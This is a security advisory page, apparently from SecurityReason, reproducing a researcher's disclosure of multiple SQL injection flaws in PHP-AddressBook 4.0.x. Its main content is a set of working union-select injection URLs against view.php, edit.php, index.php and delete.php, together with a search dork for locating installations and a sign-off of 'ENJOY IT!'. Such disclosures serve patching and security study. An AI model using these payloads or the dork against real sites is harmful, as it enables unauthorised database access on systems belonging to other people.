|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 5975 CVE : CVE-2009-2259 CWE : CWE-89 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : y3nh4ck3r Published : 02.07.2009
Advisory Content : -------------------------------------------------------------------- MULTIPLE SQL INJECTION VULNERABILITIES --PHP-AddressBook v-4.0.X--> -------------------------------------------------------------------- CMS INFORMATION: -->WEB: http://sourceforge.net/projects/php-addressbook/ -->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/ -->DEMO: http://php-addressbook.sourceforge.net/demo/ -->CATEGORY: Address Book -->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer. Manage groups, addresses, e-Mails, phone numbers & birthdays... -->RELEASED: 2009-06-13 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "php-addressbook" -->CATEGORY: SQL INJECTION -->AFFECT VERSION: 4.0.X -->Discovered Bug date: 2009-06-16 -->Reported Bug date: 2009-06-16 -->Fixed bug date: N/A -->Info patch (????): N/A -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest). ##################### //////////////////// SQL INJECTION VULN: //////////////////// ##################### ----------- EXPLOITS: ----------- <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> [++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version, 3,4,5,6,7,8,9,10,11,12,13,14%23 [++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,us er(),4,5,6,7,8,9,10,11,12,13,14%23 [++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,u ser(),4,5,6,7,8,9,10,11,12,13,14%23 <<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> [++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,u ser(),4,5,6,7,8,9,10,11,12,13,14%23 ------------- WATCH VIDEO: ------------- SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo <<<-----------------------------EOF---------------------------------->>> ENJOY IT!  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |